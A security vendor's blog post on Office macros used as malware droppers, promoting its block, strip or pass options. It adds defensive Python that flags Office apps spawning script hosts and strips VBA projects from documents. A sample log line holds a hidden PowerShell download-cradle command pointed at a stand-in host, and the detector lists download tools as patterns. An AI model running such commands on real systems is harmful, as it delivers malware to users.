by Tim Freestone | Blog

When it comes to Office macros, it’s all about striking a balance, argues Deep Secure Principal Solutions Architect Tim Freestone.

Why Macros Matter

Office macros were invented as a mechanism to automate tasks and, critically, to save people's time. Certain sectors and types of user rely on them more than others. One example is users in financial technology organisations, who use them extensively in their day-to-day work.

Another type of “user” who relies on macros is the cybercriminal. Macros are an easy attack vector: as much as 98% of Microsoft Office-targeted threats use macros. On operating systems such as Windows 10 and Windows 7, the built-in security features mean that a macro is mainly used as a dropper, fetching or launching the real payload rather than carrying it.

For example, attackers compromise a legitimate web server and host malicious executables on it. The macro, delivered to the user's desktop in an Office file, simply downloads the executable to the user's machine, where it is executed.

In another example, a macro in an Office file calls out to a piece of PowerShell that purposely never touches the disk, leaving as small a footprint as possible on the infected machine.

Either way, the point of embedding the macro in the Office file is to confuse a detection-based cyber defence to the point that it has no idea what is going on; as a result it allows the file through, because the file cannot be proven to contain malicious content.
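As an added illustration (not part of the original post, and not Deep Secure's code), the following Python shows how the two behaviours just described look in process-creation telemetry and how a defender can flag them: an Office application spawning a script host that fetches content from the network, and an Office application launching an executable from a user-writable path. The log lines are constructed, and the field names (parent_image, image, command_line) are an assumption modelled loosely on Sysmon-style process-creation events.

```python
import json
from dataclasses import dataclass

# Constructed sample telemetry (JSON lines); field names are an assumption
# of this example, loosely modelled on Sysmon process-creation events.
SAMPLE_LOG = r"""
{"id": 1, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "WINWORD.EXE invoice.docm"}
{"id": 2, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')"}
{"id": 3, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe", "command_line": "update.exe"}
{"id": 4, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "WINWORD.EXE /n attachment.docx"}
{"id": 5, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -Command Get-Date"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Substrings that indicate the script host is pulling content from the network.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "bitsadmin", "certutil")
# Locations a macro can write to without elevation; the classic dropper landing zones.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Apply the Office-parent rules to one process-creation event."""
    parent = basename(event.get("parent_image", ""))
    child_path = event.get("image", "")
    child = basename(child_path)
    cmd = event.get("command_line", "").lower()
    findings = []
    if parent not in OFFICE_APPS:
        return findings  # only what Office itself spawns is of interest here
    if child in SCRIPT_HOSTS:
        findings.append(Finding(event["id"], "office_spawns_script_host", f"{parent} -> {child}"))
        if any(m in cmd for m in DOWNLOAD_MARKERS):
            findings.append(Finding(event["id"], "script_host_downloads", cmd[:80]))
    elif (child.endswith(".exe") and child not in OFFICE_APPS
          and any(m in child_path.lower() for m in USER_WRITABLE)):
        findings.append(Finding(event["id"], "office_launches_exe_from_user_path", child_path))
    return findings


def scan(log_text):
    """Run evaluate() over every JSON line and collect the findings."""
    findings = []
    for line in log_text.strip().splitlines():
        if line.strip():
            findings.extend(evaluate(json.loads(line)))
    return findings


def rules_for(findings, event_id):
    """Set of rule names that fired for a given event id."""
    return {f.rule for f in findings if f.event_id == event_id}


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
```

Events 1 and 4 produce nothing (Explorer and Outlook opening Office files is normal), event 5 fires only the parent/child rule, and events 2 and 3 match the PowerShell and dropper patterns respectively. In production the parent/child rule on its own is noisy in environments where legitimate macros call out to scripts, which is exactly why the second indicator (a download marker or a user-writable launch path) is worth layering on top.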

Macros matter both because organisations need them and because they are the most likely way of initiating an attack. So how do we square the circle?

Configurable Options

Deep Secure’s Threat Removal technology has supported configurable options for dealing with Office macros since Version 1.10, but it’s worth recapping what these are and how they address the problem.

The first and most draconian option is to stop any document containing an Office macro from being delivered. For many this is not a practical solution to the problem and something more nuanced is required.

The second configurable option is to remove the Office macro prior to transforming the document. The macro – regardless of whether it is benign or malicious – is discarded at the outset and the rest of the document is then transformed and rendered 100% malware free before being delivered.

A third configurable option is to leave the Office macro untouched, transform the rest of the document to render it threat-free and then deliver it complete with the original macro.
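To make the three options concrete, here is an added example in Python (not Deep Secure's code, and not how the Threat Removal product is implemented) that detects a VBA project inside an OOXML container and applies a per-user-group, per-file-type policy of block, strip or pass. The policy table, the group names and the sample workbook are constructed; the part names, relationship types and content types are the standard OOXML ones. It goes slightly beyond the text in showing what "strip" has to touch inside the container: the vbaProject.bin part, the relationship entry that points at it, and its content-type override.

```python
"""Macro policy for OOXML documents: detect a VBA project in the zip
container, then block, strip or pass it per user group and file type.
Added example; the policy and sample document are constructed."""
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
WS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"
VBA_REL = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
# Macro-enabled main-part content types and their macro-free equivalents.
MACRO_TO_PLAIN = {
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml",
    "application/vnd.ms-word.document.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
}
# Constructed policy: (user group, extension) -> action; "*" is a wildcard.
POLICY = {("power-users", "xlsm"): "pass", ("*", "docm"): "block", ("*", "*"): "strip"}


def decide(group, ext):
    """Most specific policy entry wins; falls back to the global default."""
    for key in ((group, ext), (group, "*"), ("*", ext), ("*", "*")):
        if key in POLICY:
            return POLICY[key]
    return "block"


def part_names(data):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def read_part(data, name):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def has_macro(data):
    # A VBA project lives in a vbaProject.bin part (under word/, xl/ or ppt/).
    return any(n.lower().endswith("vbaproject.bin") for n in part_names(data))


def _drop_refs(xml_bytes, needle, default_ns):
    """Remove child elements whose attributes reference the VBA part."""
    ET.register_namespace("", default_ns)  # keep the default namespace unprefixed
    root = ET.fromstring(xml_bytes)
    for child in list(root):
        if any(needle in v.lower() for v in child.attrib.values()):
            root.remove(child)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def strip_macros(data):
    """Rebuild the container without vbaProject.bin, its relationship and its
    content-type override, and downgrade the main part to the macro-free type."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name.lower().endswith("vbaproject.bin"):
                continue
            payload = src.read(name)
            if name == "[Content_Types].xml":
                payload = _drop_refs(payload, "vbaproject.bin", CT_NS)
                for macro_ct, plain_ct in MACRO_TO_PLAIN.items():
                    payload = payload.replace(macro_ct.encode(), plain_ct.encode())
            elif name.lower().endswith(".rels"):
                payload = _drop_refs(payload, "vbaproject.bin", REL_NS)
            dst.writestr(name, payload)
    return out.getvalue()


def process(data, ext, group):
    """Return (action, bytes to deliver or None). Transforming the rest of the
    document (the vendor's threat-removal step) is out of scope here."""
    if not has_macro(data):
        return "deliver", data
    action = decide(group, ext)
    if action == "block":
        return "block", None
    if action == "strip":
        return "strip", strip_macros(data)
    return "pass", data


def build_sample(macro_enabled):
    """Constructed minimal workbook container (not a real Excel file)."""
    macro_ct = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
    main_ct = macro_ct if macro_enabled else MACRO_TO_PLAIN[macro_ct]
    types = [f'<Types xmlns="{CT_NS}">',
             f'<Override PartName="/xl/workbook.xml" ContentType="{main_ct}"/>']
    rels = [f'<Relationships xmlns="{REL_NS}">',
            f'<Relationship Id="rId1" Type="{WS_REL}" Target="worksheets/sheet1.xml"/>']
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if macro_enabled:
            types.append('<Override PartName="/xl/vbaProject.bin" '
                         'ContentType="application/vnd.ms-office.vbaProject"/>')
            rels.append(f'<Relationship Id="rId2" Type="{VBA_REL}" Target="vbaProject.bin"/>')
            zf.writestr("xl/vbaProject.bin", b"CONSTRUCTED PLACEHOLDER, NOT A VBA PROJECT")
        zf.writestr("[Content_Types].xml", "\n".join(types + ["</Types>"]))
        zf.writestr("xl/_rels/workbook.xml.rels", "\n".join(rels + ["</Relationships>"]))
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample(True)
    for group in ("power-users", "finance"):
        action, delivered = process(doc, "xlsm", group)
        print(group, action, "macro present:", delivered is not None and has_macro(delivered))
```

Two caveats for anyone adapting this: it only understands the zip-based OOXML formats (.docm, .xlsm, .pptm), so legacy binary .doc/.xls files, where the VBA project sits inside an OLE compound file, need a different parser; and stripping the macro says nothing about the rest of the document, which is the part the transformation step exists to deal with.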

Striking a Balance

In practice, these options are necessary because it’s important to find the right balance between security and productivity. Many organisations will be happy to remove Office macros, transform documents and deliver them to the vast majority of their users. Equally, chances are those organisations will have a community of, let’s call them, power users. These may well be Microsoft Excel users, and they will want access to Excel files containing macros because they need them to do their job.

The good news is that Deep Secure’s Threat Removal products, information eXchange (iX), Gateway eXchange (GX) and Application eXchange (AX), can all be configured to work with the existing boundary protection defence and to support these differing requirements on a per-filetype and per-user basis.

Good security must be flexible if it is to be effective. Deep Secure’s Threat Removal technology enables the organisation to enjoy the security that comes with transforming documents to remove any threat they might contain, while at the same time allowing those who need Office macros access to them so that they can work productively.
